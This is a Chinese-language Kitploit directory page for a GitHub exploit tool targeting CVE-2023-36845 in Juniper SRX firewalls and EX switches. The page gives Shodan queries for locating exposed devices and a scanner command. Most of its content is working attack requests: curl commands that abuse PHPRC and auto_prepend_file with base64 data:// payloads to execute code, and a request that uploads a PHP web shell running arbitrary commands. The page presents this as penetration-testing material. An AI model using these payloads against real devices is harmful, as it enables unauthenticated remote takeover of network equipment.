Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/charondefalt/juniper-exploit-cve-2023-36845
侦察漏洞分析漏洞利用Web应用程序漏洞利用命令与控制Payload 开发
GitHubcharondefalt/juniper-exploit-cve-2023-36845

Juniper-exploit-CVE-2023-36845

针对CVE-2023-36845的漏洞利用工具,通过PHP环境变量操纵,在Juniper SRX防火墙和EX交换机上实现未经认证的远程代码执行,具备检测和载荷投递能力。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Juniper-exploit-CVE-2023-36845 — 针对CVE-2023-36845的漏洞利用工具,通过PHP环境变量操纵,在Juniper SRX防火墙和EX交换机上实现未经认证的远程代码执行,具备检测和载荷投递能力。 | Kitploit
查看仓库
2年前尚未审核

CVE-2023-36845

描述

CVE-2023-36845 是一项值得注意的 PHP 环境变量操纵漏洞,影响 Juniper SRX 防火墙和 EX 交换机。虽然 Juniper 将此漏洞归类为中等严重性,但在本文中,我们将阐述如何利用这一单一漏洞实现远程、未经身份验证的代码执行。

搜索 - Shodan

root@kitploit:~
title:"Juniper Web Device Manager"
图像
root@kitploit:~
title:"Juniper" http.favicon.hash:2141724739
图像

使用方法 🛠

检测

root@kitploit:~
python3 CVE-2023-36845.py -f targets.txt -o output.txt

RCE 🧨

选项 1

利用任何协议包装器配合 auto_prepend_file 是可行的。此操作最合适的选择是 data:// 协议,它允许内联提供“次要文件”。以下是此漏洞利用的高级表示,在 data:// 方案内执行嵌入的 <? phpinfo(); ?>:

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'

执行 whoami 命令

<?php shell_exec('whoami'); ?>

root@kitploit:~
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'

选项 2

上传文件

<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>

root@kitploit:~
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'

参数 🧰

参数描述类型
--file / -f输入目标文件文件
-o输出文件文件
下载工具